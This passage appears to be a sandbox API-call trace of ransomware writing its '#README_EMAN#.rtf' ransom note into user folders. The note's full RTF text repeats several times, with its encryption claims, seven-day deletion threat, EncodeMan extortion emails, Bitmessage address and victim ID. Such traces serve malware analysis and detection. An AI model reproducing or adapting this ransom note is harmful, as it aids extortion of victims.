B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23731c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGé(²S#JÊé¶\x8a\x16Cµ\x81¬O]S\x0cð\x92/£\x01", lpUsedDefaultChar=0x0) returned 8717 [0297.155] WriteFile (in: hFile=0x2cc, lpBuffer=0x23731c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23731c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.156] CloseHandle (hObject=0x2cc) returned 1 [0297.156] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0297.156] GetLastError () returned 0x2 [0297.156] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0297.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 